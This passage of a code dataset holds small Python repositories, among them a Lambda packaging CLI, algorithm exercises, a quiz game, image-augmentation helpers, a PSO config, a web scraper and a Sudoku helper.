-name {} -prune -o -print0 | cpio -pmd0 {}/stageify/'.format(os.path.basename(virtual_directory), virtual_directory), shell=True)\n\n click.echo('Staging complete.')\n\n@main.command()\n@click.option('--lambda_handler', '-h', default='app.lambda_handler', help='The handler to be called (Default: app.lambda_handler)')\n@click.option('--detail', '-d', help='A JSON string to be sent to the event parameter')\ndef test(lambda_handler, detail):\n \"\"\"Test your project in a lambda docker clone\"\"\"\n subprocess.call('docker run --rm -v \"$VIRTUAL_ENV/stageify\":/var/task lambci/lambda:python3.6 {} \\'{}\\''.format(lambda_handler, detail), shell=True)\n\n@main.command()\ndef zip():\n \"\"\"Create a zip file to upload to lambda\"\"\"\n venv = os.environ['VIRTUAL_ENV']\n current_directory = os.getcwd()\n os.chdir('{}/stageify/'.format(venv))\n subprocess.call('zip -r {}/lambdaify.zip .'.format(current_directory), shell=True)\n\n\n","repo_name":"Thingable/lambdaify","sub_path":"lambdaify/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"8341497068","text":"#运行时间:29ms 占用内存:5752k\r\n\r\n#将每层的数据存进ArrayList中,偶数层时进行reverse操作\r\n# -*- coding:utf-8 -*-\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n# -*- coding:utf-8 -*-\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\nclass Solution:\r\n def Print(self, pRoot):\r\n # write code here\r\n # 1.迭代 ,层遍历 左到右, 右到左\r\n if not pRoot :\r\n return []\r\n result=[]\r\n result_tmp=[pRoot]\r\n flag=0\r\n while result_tmp:\r\n tmp_list=[]\r\n r=[]\r\n for tmp in result_tmp:\r\n r.append(tmp.val)\r\n if tmp.left:\r\n tmp_list.append(tmp.left)\r\n if tmp.right:\r\n tmp_list.append(tmp.right)\r\n result_tmp=tmp_list\r\n if r and flag :\r\n result.append(r[::-1])\r\n flag=0\r\n elif r:\r\n result.append(r)\r\n flag=1\r\n \r\n return result\r\n \r\n\r\n \r\n \r\n ","repo_name":"peterpwb/leetcode","sub_path":"剑指Offer/按之字形顺序打印二叉树.py","file_name":"按之字形顺序打印二叉树.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4391640867","text":"from functions.functions_to_optimise import * \n\n\ndef config_pso():\n \"\"\"\n Return a config type with all the parameter to test \n\n You just have to change the params and rerun the pso_script you prefer \n\n Returns:\n dict: with all the hyperparameter,the constraint and the function to optimize \n \"\"\"\n \n params = {\n \"nb_part\" : 5, #Number of birds/ particules in one simulation\n \"vit\" : 0.1, # The velocity of the bird (will be decrease across the iteration) move it when the support of the function is large\n \"c1\" : 0.2, # The independance level of the particule from the group (Exploration level) c1 in [0,+inf[\n \"c2\" : 0.2, # The dependance level of the particule from the group (Exploitation level) c2 in [0,+inf[\n \"max_ite\" : 1000, # Number of iteration (moves) of each particules in the space in one MC simulation \n \"nb_simulation_MC\" : 20 , # The number of Monte Carlo simulation you want to do (to see the convergence)\n \"min_x\" : -5, # the minimum value that x_i can take, for all i = 1,...,\"Dim\"\n \"max_x\" : 5, # the maximum value that x_i can take, for all i = 1,...,\"Dim\"\n \"Dim\" : 2, # The number of variable in input if f(x) = y \"Dim\" = 1, if f(x,z) 
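The zigzag-print record above collects each BFS level and reverses every other one after the fact. An equivalent sketch that folds the direction flag into a slice step instead of two reversal branches (assumes the same `TreeNode` shape as the record's commented header):

```python
def zigzag_levels(root):
    # [::1] keeps the level order, [::-1] reverses it; the step flips per level.
    if not root:
        return []
    result, level, step = [], [root], 1
    while level:
        result.append([node.val for node in level][::step])
        step = -step
        level = [child for node in level
                 for child in (node.left, node.right) if child]
    return result
```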
= y : \"Dim\" = 2 ... \n \"min_max\" : \"min\", # \"min\" if you want to minimize your function else \"maximize\"\n \"function\" : Rastrigin, # change here the function you want to optimize \n }\n \n return params\n\n","repo_name":"TheoAlegretti/PSO","sub_path":"config_pso.py","file_name":"config_pso.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7115586103","text":"#quiz game in python program\n#create a dictionary that stores questions and answers\n#have a variable that tracks the score of the player\n#loop through the dictionary using the key value pairs\n#display each question to the user and allow them to answers\n#tell them if they are right or wrong\n#show user the final result when quiz is completed\n\nprint(\"Welcome to the quiz!\")\n\nplaying = input(\"Do you want to play? \")\nif playing != \"yes\":\n quit()\nprint (\"Okay! Let's play :)\")\nprint (\"\")\n\nquiz = {\n \"question1\": {\n \"question\": \"What is the capital of India?\",\n \"answer\": \"New Delhi\"\n },\n \"question2\": {\n \"question\": \"What is the capital of Philippines?\",\n \"answer\": \"Manila\"\n },\n \"question3\": {\n \"question\": \"What is the capital of Germany?\",\n \"answer\": \"Berlin\"\n },\n \"question4\": {\n \"question\": \"What is the capital of Japan?\",\n \"answer\": \"Tokyo\"\n },\n \"question5\": {\n \"question\": \"What is the capital of Kenya?\",\n \"answer\": \"Nairobi\"\n },\n \"question6\": {\n \"question\": \"What is the capital of Norway?\",\n \"answer\": \"Oslo\"\n },\n \"question7\": {\n \"question\": \"What is the capital of Portugal?\",\n \"answer\": \"Lisbon\"\n },\n \"question8\": {\n \"question\": \"What is the capital of Sweden?\",\n \"answer\": \"Stockholm\"\n }, \n \"question9\": {\n \"question\": \"What is the capital of Colombia?\",\n \"answer\": \"Bogota\"\n },\n \"question10\": {\n \"question\": \"What is the capital of Finland?\",\n \"answer\": \"Helsinki\"\n }\n}\n\nscore = 0\n\nfor key, value in quiz.items():\n print(value['question'])\n answer = input ('Answer? 
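The hyperparameters documented in `config_pso` above map one-to-one onto the textbook particle-swarm velocity update. A sketch of a single swarm step reusing those key names (`vit` as inertia weight, `c1` exploration, `c2` exploitation):

```python
import numpy as np

def pso_step(x, v, pbest, gbest, vit, c1, c2, rng=np.random.default_rng()):
    # x, v, pbest: (nb_part, Dim) arrays; gbest: the swarm-best point (Dim,).
    r1 = rng.random(x.shape)
    r2 = rng.random(x.shape)
    v = vit * v + c1 * r1 * (pbest - x) + c2 * r2 * (gbest - x)
    return x + v, v
```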
')\n \n if answer.lower() == value['answer'].lower():\n print ('Correct!')\n score = score + 1\n print ('Your score is ' + str(score))\n print (\"\")\n print (\"\")\n \n else:\n print('Wrong!')\n print ('The answer is : ' + value['answer'])\n print ('Your score is ' + str(score))\n print(\"\")\n print(\"\")\n \nprint (\"You got \" + str(score) + \" out of 10 questions correctly!\")\nprint (\"Your percentage is \" +str(int(score/10*100)) + \"%\")\n","repo_name":"Maryam0330/Python-Repo","sub_path":"quiz_game.py","file_name":"quiz_game.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"29782325030","text":"\"\"\"Tests for the vasculature component of the lung cancer hypermodel\n\"\"\"\n\nimport ChicCommon\nimport VesselComponent\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef analytical_solution(time, parameters):\n \n Vmax = parameters[0]\n Veq = parameters[1]\n V0 = parameters[2]\n \n req = parameters[3]\n rs = parameters[4]\n \n feq = parameters[5]\n f = parameters[6]\n \n if f >= feq:\n rmax = rs\n else:\n rmax = 0.0\n \n V = (rmax * (Vmax - (Vmax - V0) * math.exp(-(rmax + req) * time)) + \n req * (Veq - (Veq - V0) * math.exp(-(rmax + req) * time))) / (rmax + req)\n\n return V\n\ndef numerical_solution(timeIncrement, parameters):\n \n Vmax = parameters[0]\n Veq = parameters[1]\n V0 = parameters[2]\n \n req = parameters[3]\n rs = parameters[4]\n \n feq = parameters[5]\n f = parameters[6]\n \n if f >= feq:\n rmax = rs\n else:\n rmax = 0.0\n \n delta = (rmax * (Vmax - V0) - req * (V0 - Veq) )\n \n V = V0 + delta * timeIncrement \n return V\n\nVmax = 1.0\nVeq = 0.5\nV0 = 0.05\nreq = 0.1\nrs = 0.1\nfeq = 0.5\nf = 0.6\nendTime = 20\ntimeIncrement = 0.1\n\nparameters = [Vmax, Veq, V0, req, rs, feq, f]\n\n# Get the analytical solution\ntimeAnalytical = np.arange(0, endTime + timeIncrement, timeIncrement)\nvascAnalytical = []\nfor eachTime in timeAnalytical:\n vascAnalytical.append(analytical_solution(eachTime, parameters))\n \n# Get the numerical solution\ntimeNumerical = np.arange(0, endTime + timeIncrement, timeIncrement)\nvascNumerical = [V0]\nfor eachIncrement in range(len(timeNumerical) - 1):\n newVasc = numerical_solution(timeIncrement, parameters)\n parameters[2] = newVasc\n vascNumerical.append(newVasc)\n \n# Get the module solution\nvesselParameters = {\"name\": \"VesselSimulation\",\n \"numSteps\": 100,\n \"timeIncrement\": timeIncrement,\n \"outputFrequency\": 1,\n \"spacing\": 0.1,\n \"numX\": 10,\n \"numY\": 10,\n \"numZ\": 10,\n \"vMax\": 1.0,\n \"vEq\": 0.5,\n \"rMax\": 0.1,\n \"rEq\": 0.1,\n \"initialConditionFile\": None,\n \"coexecutionFile\": None,\n \"coexecutionWait\": 0.0} \n \noutputDirectory = os.getcwd()\nvesselSimulation = VesselComponent.VesselSimulation(outputDirectory, \n vesselParameters)\nfor eachCell in vesselSimulation.grid.cells:\n eachCell.set_cell_population(0.05)\n \nfor jdx, eachCell in enumerate(vesselSimulation.grid.cells):\n eachCell.factor = 0.6\n \ntimeModel = [0.0]\nvascModel = [0.05]\ndiff = [0]\nfor idx in range(100):\n vesselData = vesselSimulation.step(parentInput = True)\n timeModel.append((idx + 1) * timeIncrement)\n \n rsum = 0.0\n for eachEntry in vesselData:\n rsum = rsum + eachEntry[1]\n vascModel.append(rsum / len(vesselData))\n diffResult = abs((vascModel[idx + 1] - vascAnalytical[idx + 1]) / vascAnalytical[idx + 1])\n diff.append(diffResult)\n \n\n# Get the standalone solution\n#plt.plot(timeAnalytical, 
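The closed form in `analytical_solution` above solves dV/dt = rmax*(Vmax - V) - req*(V - Veq), so for f >= feq both it and the Euler scheme should settle at V* = (rmax*Vmax + req*Veq)/(rmax + req). A quick cross-check with the module's own constants:

```python
# Forward-Euler sanity check; with the snippet's parameters V* = 0.75.
rmax, req, Vmax, Veq = 0.1, 0.1, 1.0, 0.5
V, dt = 0.05, 0.1
for _ in range(5000):
    V += (rmax * (Vmax - V) - req * (V - Veq)) * dt
print(V, (rmax * Vmax + req * Veq) / (rmax + req))   # both ~0.75
```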
vascAnalytical, label='Analytical')\n#plt.plot(timeNumerical, vascNumerical, label='Numerical')\nplt.plot(timeModel, diff, marker='o',label='Component Model')\nplt.ylabel('Abs Relative Error')\nplt.xlabel('Time [T]')\nlegend = plt.legend(loc='upper center', shadow=True)\n#plt.axis([0, endTime , 0, 0.0015])\nplt.show()\n\n\n ","repo_name":"jmsgrogan/Chic","sub_path":"src/python-d6_2/LC_Hypermodel_Tests.py","file_name":"LC_Hypermodel_Tests.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32725671881","text":"import numpy as np\nimport cv2\n\n\ndef flip(images,labels,original_command,debug=False):\n if original_command.lower() == 'left':\n target_index = 0\n new_target_row = [0, 0, 1]\n new_command = 'right'\n elif original_command.lower() == 'up':\n target_index = 1\n new_target_row = [0, 1, 0]\n new_command = 'up'\n elif original_command.lower() == 'right':\n target_index = 2\n new_target_row = [1, 0, 0]\n new_command = 'left'\n flippables = images[np.where(labels[:, target_index] == 1)]\n if len(flippables) == 0:\n return [], []\n flipped_images = []\n new_target_array = []\n for image in flippables:\n flipped_image = cv2.flip(image, 1)\n flipped_images.append(flipped_image)\n new_target_array.append(new_target_row)\n flipped_images = np.array(flipped_images)\n new_target_array = np.array(new_target_array)\n if debug:\n for i in range(10):\n cv2.imshow(\"Original - {0} - {1}\".format(original_command,i), flippables[i])\n cv2.imshow(\"Flipped - {0} - {1}\".format(new_command,i), flipped_images[i])\n cv2.waitKey(0)\n return flipped_images, new_target_array\n\n\ndef flip_continuous(images,labels,debug=False):\n\n # Order of labels variables is angle, throttle. It\n # only makes sense to flip angle, so select the first\n # column, the one indexed at 0. 
The : means to apply\n # the transformation to all rows\n flipped_labels = labels.copy()\n flipped_labels[:, 0] = labels[:, 0] * -1\n flipped_images = []\n for image in images:\n flipped_image = cv2.flip(image, 1)\n flipped_images.append(flipped_image)\n flipped_images = np.array(flipped_images)\n if debug:\n for i in range(10):\n cv2.imshow(\"Original - {0}\".format(labels[i,:]), images[i,:])\n cv2.imshow(\"Flipped - {0}\".format(flipped_labels[i,:]), flipped_images[i,:])\n cv2.waitKey(0)\n return flipped_images, flipped_labels\n\n\ndef flip_enrichment(images,labels):\n new_right_images, new_right_labels = flip(images, labels, 'left', debug=False)\n new_left_images, new_left_labels = flip(images, labels, 'right', debug=False)\n new_up_images, new_up_labes = flip(images, labels, 'up', debug=False)\n if len(new_right_images) > 0:\n images = np.vstack((images, new_right_images))\n labels = np.vstack((labels, new_right_labels))\n if len(new_left_images) > 0:\n images = np.vstack((images, new_left_images))\n labels = np.vstack((labels, new_left_labels))\n if len(new_up_images) > 0:\n images = np.vstack((images, new_up_images))\n labels = np.vstack((labels, new_up_labes))\n return images, labels\n\ndef flip_enrichment_continuous(images,labels):\n image_images, new_labels = flip_continuous(images, labels, debug=False)\n images = np.vstack((images, image_images))\n labels = np.vstack((labels, new_labels))\n return images, labels\n\ndef normalize_contrast(images):\n normalized_images = []\n for image in images:\n img_yuv = cv2.cvtColor(image, cv2.COLOR_BGR2YUV)\n # equalize the histogram of the Y channel\n img_yuv[:, :, 0] = cv2.equalizeHist(img_yuv[:, :, 0])\n # convert the YUV image back to RGB format\n normalized_image = cv2.cvtColor(img_yuv, cv2.COLOR_YUV2BGR)\n normalized_images.append(normalized_image)\n normalized_images = np.array(normalized_images)\n return normalized_images\n\n\n# Collapses multiple data transformations; primarily used in model training scritps\ndef process_data(data):\n images, labels = data[0], data[1]\n images, labels = flip_enrichment(images, labels)\n images = apply_transformations(images)\n return images, labels\n\ndef resize_images(images,scale):\n inverted_decimal_scale = 1 / scale\n resized_images = []\n for original_image in images:\n resized_image = cv2.resize(\n original_image,\n None,\n fx=inverted_decimal_scale,\n fy=inverted_decimal_scale,\n interpolation=cv2.INTER_CUBIC\n )\n resized_images.append(resized_image)\n return resized_images\n\n# Collapses multiple data transformations; primarily used in model training scritps\ndef process_data_continuous(data, image_scale=1.0, crop_percent=1):\n images, labels = data[0], data[1]\n images, labels = flip_enrichment_continuous(images, labels)\n images = apply_transformations(images,image_scale,crop_percent)\n return images, labels\n\ndef crop_images(images, crop_percent):\n cropped_images = []\n # Assumes you want to keep bottom part of image and discard the top\n # In OpenCV, (0,0) represents top left pixel\n # https://stackoverflow.com/a/25644503/554481\n for original_image in images:\n shape = original_image.shape\n new_top_position = int(shape[0]) - int(shape[0] * (crop_percent / 100.0))\n new_bottom_position = int(shape[0])\n cropped_image = original_image[new_top_position:new_bottom_position]\n cropped_images.append(cropped_image)\n return cropped_images\n\n\n# https://www.pyimagesearch.com/2016/03/07/transparent-overlays-with-opencv/\ndef pseduo_crop(image, crop_percent, alpha):\n shape = image.shape\n 
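`flip_continuous` above encodes the key labelling convention of the self-driving-car record: mirroring a frame negates the steering angle (column 0) and leaves throttle (column 1) untouched. A tiny label-only demonstration:

```python
import numpy as np

labels = np.array([[0.3, 0.8], [-0.1, 0.5]])   # [steering, throttle] rows
flipped = labels.copy()
flipped[:, 0] *= -1                            # mirror flips steering only
print(flipped)                                 # [[-0.3  0.8] [ 0.1  0.5]]
```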
new_top_position = int(shape[0] * (crop_percent / 100.0))\n\n # Create two copies of the original image -- one for\n # the overlay and one for the final output image\n overlay = image.copy()\n output = image.copy()\n\n # Draw a white rectangle over the cropped area\n # Open CV's coordinate system:\n # https://stackoverflow.com/a/25644503/554481\n '''\n 0/0---column--->\n |\n |\n row\n |\n |\n v\n '''\n top_left_corner = (0, 0)\n bottom_right_corner = (shape[1], new_top_position)\n rgb_color = (255, 255, 255)\n cv2.rectangle(\n overlay,\n top_left_corner,\n bottom_right_corner,\n rgb_color,\n -1\n )\n\n # Apply the overlay\n cv2.addWeighted(\n overlay,\n alpha,\n output,\n 1 - alpha,\n 0,\n output\n )\n\n return output\n\n\n# I've separated this from `process_data` so that I can use it in both training\n# and scoring. Relying on process_data alone wasn't sufficient for scoring\n# because during scoring the true labels aren't known at runtime\ndef apply_transformations(images, image_scale, crop_percent):\n images = normalize_contrast(images)\n images = images / 255\n if crop_percent > 0:\n images = crop_images(\n images=images,\n crop_percent=crop_percent\n )\n if image_scale != 1:\n images = resize_images(\n images=images,\n scale=image_scale\n )\n return images\n\ndef show_resize_effect(original_image, scale):\n smaller_scale = 1/scale\n shrunken_image = cv2.resize(original_image, None, fx=smaller_scale, fy=smaller_scale, interpolation=cv2.INTER_CUBIC)\n enlarged_image = cv2.resize(shrunken_image, None, fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)\n return enlarged_image\n","repo_name":"RyanZotti/Self-Driving-Car","sub_path":"ai/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":7023,"program_lang":"python","lang":"en","doc_type":"code","stars":1020,"dataset":"github-code","pt":"34"} +{"seq_id":"47170250961","text":"def teens_number_word(n):\n lengths = {\n 1: 3, # one\n 2: 3, # two\n 3: 5, # three\n 4: 4, # four\n 5: 4, # five\n 6: 3, # six\n 7: 5, # seven\n 8: 5, # eight\n 9: 4, # nine\n 10: 3, # ten\n 11: 6, # eleven\n 12: 6, # twelve\n 13: 8, # thirteen\n 14: 8, # fourteen\n 15: 7, # fifteen\n 16: 7, # sixteen\n 17: 9, # seventeen\n 18: 8, # eighteen\n 19: 8, # nineteen\n 20: 6, # twenty\n 30: 6, # thirty\n 40: 5, # forty\n 50: 5, # fifty\n 60: 5, # sixty\n 70: 7, # seventy\n 80: 6, # eighty\n 90: 6} # ninety\n\n other = 0\n while lengths.get(n) == None:\n other += 1\n n -= 1\n\n n = lengths.get(n)\n if other != 0:\n n += teens_number_word(other)\n return n\n\ndef hundreds_number_word(n):\n hunnies = n // 100\n teens = n % 100\n result = 0\n\n if hunnies > 0:\n result += teens_number_word(hunnies) + 7\n if teens > 0:\n result += teens_number_word(teens)\n if hunnies > 0 and teens > 0:\n result += 3\n return result\n\ndef thousands_number_word(n):\n hunnies = n // 1000\n teens = n % 1000\n result = 0\n\n if hunnies > 0:\n result += hundreds_number_word(hunnies) + 8\n if teens > 0:\n result += hundreds_number_word(teens)\n return result\n\ndef solve(m):\n return sum(map(thousands_number_word, range(1, m+1)))\n","repo_name":"xfbs/euler","sub_path":"src/017-number-letter-counts/python/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25011897864","text":"\"\"\"Moosetash Exceptions\"\"\"\n\n\nclass MustacheSyntaxError(Exception):\n \"\"\"Error during parsing template\"\"\"\n\n @classmethod\n def 
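A quick sanity check for the Project Euler letter-count helpers above, assuming `hundreds_number_word` and `solve` from that record are in scope; 342 is the worked example from the problem statement ("three hundred and forty-two", 23 letters when spaces and hyphens are ignored):

```python
# Relies on the solver functions defined in the record above.
print(hundreds_number_word(342))   # 23
print(solve(5))                    # 19  (one + two + three + four + five)
```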
from_template_pointer(cls, msg: str, template: str, pointer: int):\n \"\"\"Create syntax error with positional information\"\"\"\n\n line_number = template[:pointer].count('\\n') + 1\n return cls(msg.format(line_number=line_number))\n\n\nclass ContextAccessError(Exception):\n \"\"\"Error getting a variable from context\"\"\"\n\n\nclass LambdaException(ContextAccessError):\n \"\"\"Partial is missing from partials dictionary\"\"\"\n\n\nclass MissingVariable(Exception):\n \"\"\"Variable is missing from context\"\"\"\n\n\nclass MissingPartial(Exception):\n \"\"\"Partial is missing from partials dictionary\"\"\"\n","repo_name":"michaelrccurtis/moosetash","sub_path":"moosetash/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"25091952265","text":"#!/usr/bin/env python3\r\n\r\nimport sys\r\nfile_name = sys.argv[1]\r\nargs = sys.argv[2:]\r\n\r\nwith open(file_name, \"w\") as f:\r\n i = 0\r\n while i < len(args):\r\n f.write(args[i] + \"\\n\")\r\n i += 1\r\n","repo_name":"DuarteMartinho/CA116","sub_path":"Week8/labsheet8b/write-args.py","file_name":"write-args.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"18315820702","text":"# Write your solution here\n\nwordlist = []\nword_count = 0\n\nwhile True:\n\tword = input(\"Word: \")\n\tif word in wordlist:\n\t\tprint(f\"You typed in {word_count} different words\")\n\t\tbreak\n\tword_count += 1\n\twordlist.append(word)","repo_name":"jungleistx/Python-Programming-MOOC-2023","sub_path":"part04/03_lists/same_word_twice.py","file_name":"same_word_twice.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30838878892","text":"import datetime\nimport urllib.request\nimport os\nimport sys\nfrom bs4 import BeautifulSoup\n\ndef filtermp3(link): \n mp3=[]\n for l in link:\n if l[len(l)-4:]=='.mp3':\n #print(l)\n mp3.append(l)\n return mp3\nclass song_mp3skull:\n def __init__(self,name,fckh):\n self.name=name\n self.url=\"http://mp3skull.com/search_db.php?q=\"+name+\"&fckh=\"+fckh\n self.html=''\n #print(self.url)\n self.get_html()\n self.soup=BeautifulSoup(self.html)\n self.links=[]\n self.urlnames=[]\n #print(self.url)\n self.get_links()\n\n def get_html(self):\n i=0\n maxi=100\n print(\"Connecting to site..\")\n while i\"+link\n self.urlnames.append(link)\n i=i+1\n #print(link)\n\n\n def savetofile(self):\n txt=\" \" \n def givelinks(self):\n return self.links\n def givenames(self):\n return self.urlnames\n\n\ndef getfckh(): \n try:\n htm=urllib.request.urlopen('http://mp3skull.com/').read()\n s=BeautifulSoup(htm)\n \n for inp in s.find_all('input'):\n nm=inp.get('name')\n\n if nm=='fckh':\n \n fckh=inp.get('value')\n open('link.txt','w').write(fckh)\n return\n except:\n \n print(\"something!\")\n return\n","repo_name":"sudheesh4/Mpy3","sub_path":"mp3skull.py","file_name":"mp3skull.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"24314127964","text":"\nscore = input(\"Enter Score: \")\n\ntry:\n f_score = float(score)\n\nexcept:\n print(\"Error, please enter numeric input\")\n quit()\n\nif f_score > 1.0 or f_score < 0:\n #print(\"Overtime\")\n print(\"ERROR, enter score between 0.0 and 1.0\")\nelse:\n 
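`from_template_pointer` above turns a character offset into a 1-based line number and interpolates it via `str.format`, so the message must carry a `{line_number}` placeholder. A usage sketch assuming the class from the record is in scope:

```python
# template[:pointer] holds one newline, so the error reports line 2.
err = MustacheSyntaxError.from_template_pointer(
    "unclosed tag on line {line_number}",
    template="a\nb{{x\nc",
    pointer=4,
)
print(err)   # unclosed tag on line 2
```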
#print(\"regular\")\n if f_score >= 0.9:\n print(\"A\")\n elif f_score >= 0.8:\n print(\"B\")\n elif f_score >= 0.7:\n print(\"C\")\n elif f_score >= 0.6:\n print(\"D\")\n else:\n print(\"F\")\n","repo_name":"TUC01108/py4e","sub_path":"ex_03_03/ex_03_03.py","file_name":"ex_03_03.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22217743619","text":"\"\"\" 242. Valid Anagram (Difficulty: Easy).\nhttps://leetcode.com/problems/valid-anagram/\n\nGiven two strings s and t, return true if t is an anagram of s, and false otherwise.\nAn Anagram is a word or phrase formed by rearranging the letters of a different word or phrase,\ntypically using all the original letters exactly once.\n\nExample 1:\nInput: s = \"anagram\", t = \"nagaram\"\nOutput: true\n\nExample 2:\nInput: s = \"rat\", t = \"car\"\nOutput: false\n\nConstraints:\n 1 <= s.length, t.length <= 5 * 104\n s and t consist of lowercase English letters.\n\nFollow up: What if the inputs contain Unicode characters? How would you adapt your solution to such a case?\"\"\"\n\n\nclass Solution242:\n def isAnagram(self, s: str, t: str) -> bool:\n if len(s) != len(t):\n return False\n\n hashmap_s = {}\n hashmap_t = {}\n for i in range(len(s)):\n hashmap_s[s[i]] = 1 + hashmap_s.get(s[i], 0)\n hashmap_t[t[i]] = 1 + hashmap_t.get(t[i], 0)\n\n for char in hashmap_s:\n if hashmap_s[char] != hashmap_t.get(char, 0):\n return False\n\n return True\n # Alternative solution using sorted()\n # return sorted(s) == sorted(t)\n\n\nsolution = Solution242()\nprint(solution.isAnagram(s=\"anagram\", t=\"nagaram\"))\nprint(solution.isAnagram(s=\"rat\", t=\"car\"))\n","repo_name":"Erik-Simonian/Leetcode","sub_path":"Arrays and Hashing/Problem 242 Valid Anagram.py","file_name":"Problem 242 Valid Anagram.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17514787163","text":"# money = 'Ture'\n# if money:\n# print(\"hello\")\n\nmoney = 2000\nif money >= 3000:\n print(\"이상이다\")\nelse:\n print(\"이하다\")\n\n# or\nmoney_cho = 3000\ncard = 'Ture'\nif money_cho >=4500 or card:\n print(\"지불가능\")\nelse:\n print(\"불가능\")\n\n#and\nmoney_cho = 3000\ncard = 'Ture'\nif money_cho >=4500 and card:\n print(\"지불가능\")\nelse:\n print(\"불가능\")\n\n#not\nmoney_cho = 3000\ncard = 'Ture'\nif not True:\n print(\"지불가능\")\nelse:\n print(\"불가능\")\n\n# in, not in\n# tuple을 이용한다\n\n#list\nls = [1,2,3]\nls1 = 1 in [1,2,3]\nprint(ls1)\n\nls1 = 1 not in [1,2,3]\nprint(ls1)\n\n#tuple\n\nrastech = ('cho', 'pak', 'jeon', 'che')\nmenver = 'cho' in rastech\nprint(menver)\n\n# if문이랑 합친거\nwishlist = ['girlfirend', 'joden', 'money', 'car']\nif 'girlfirend' in wishlist:\n print(\"여자친구있음\")\nelse:\n print(\"없스어영요\")\n\n\n# if elif 문\n\nwishlist = ['girlfirend', 'joden', 'money', 'car']\nif 'boyfirend' in wishlist:\n print(\"있음\")\nelse:\n if 'girlfirend' in wishlist:\n print(\"여친있음\")\n else:\n print(\"없음\")\n\n# if문 한줄로 줄이기\npocket = ['paper', 'money', 'cellphone']\nif 'money' in pocket: pass\nelse:\n print(\"카드를 꺼내라\")\n \n\n\n\n","repo_name":"CHOMINCHODAN/python_grammar","sub_path":"if.py","file_name":"if.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25347741626","text":"import pygame as pg\nfrom Sudoku.Helper import board, av_nums, pos_nums, WIDTH, HEIGHT, COLS, ROWS, BLUE, BLACK, WHITE, 
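The two hand-rolled hash maps in the anagram record above build exactly what `collections.Counter` builds; a one-line equivalent for comparison:

```python
from collections import Counter

def is_anagram(s: str, t: str) -> bool:
    # Counter equality compares the full letter histograms at once.
    return Counter(s) == Counter(t)
```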
font_num, LIGHT_BLUE, \\\n footnote_board, LIGHT_GRAY, font_footnote, font_mini_num, static_board, GRAY\n\n\ndef used_nums(cox, coy):\n # Will check which numbers can be inserted on the given coordinates, and update the av_nums in constants.\n av_nums.clear()\n used_nums = []\n # Checks the horizontal line\n for num in board[coy]:\n if num < 10:\n used_nums.append(num)\n # Checks the vertical line\n for yrow in board:\n if yrow[cox] < 10:\n used_nums.append(yrow[cox])\n # Checks the box\n ybox = coy // 3\n xbox = cox // 3\n for ynum in range(3):\n for xnum in range(3):\n if board[ybox * 3 + ynum][xbox * 3 + xnum] < 10:\n used_nums.append(board[ybox * 3 + ynum][xbox * 3 + xnum])\n # updating av_nums in constants.\n for num in pos_nums:\n if num not in used_nums:\n av_nums.append(num)\n\n\ndef check_win():\n for yrow in board:\n for x in yrow:\n if x == 10 or x == 11:\n return False\n else: return True\n\n\ndef drawboard(window):\n for numy, yrow in enumerate(board):\n for numx, x in enumerate(yrow):\n if x == 10:\n pass\n elif x == 11:\n pg.draw.circle(window, BLUE, (int(numx * (WIDTH // ROWS) + WIDTH // ROWS * 0.5 + 2),\n int(numy * (HEIGHT // COLS) + HEIGHT // COLS * 0.5 + 2)),\n int(WIDTH // ROWS * 0.5 - 5))\n pg.draw.circle(window, WHITE, (int(numx * (WIDTH // ROWS) + WIDTH // ROWS * 0.5 + 2),\n int(numy * (HEIGHT // COLS) + HEIGHT // COLS * 0.5 + 2)),\n int(WIDTH // ROWS * 0.5 - 8))\n elif x == 12:\n pg.draw.circle(window, LIGHT_BLUE, (int(numx * (WIDTH // ROWS) + WIDTH // ROWS * 0.5 + 2),\n int(numy * (HEIGHT // COLS) + HEIGHT // COLS * 0.5 + 2)),\n int(WIDTH // ROWS * 0.5 - 5))\n pg.draw.circle(window, WHITE, (int(numx * (WIDTH // ROWS) + WIDTH // ROWS * 0.5 + 2),\n int(numy * (HEIGHT // COLS) + HEIGHT // COLS * 0.5 + 2)),\n int(WIDTH // ROWS * 0.5 - 8))\n else:\n if static_board[numy][numx] == 1:\n color = BLACK\n else:\n color = GRAY\n text = font_num.render(str(x), False, color)\n window.blit(text, (numx * (WIDTH / ROWS) + (WIDTH / ROWS * 0.3),\n numy * (HEIGHT / COLS) + 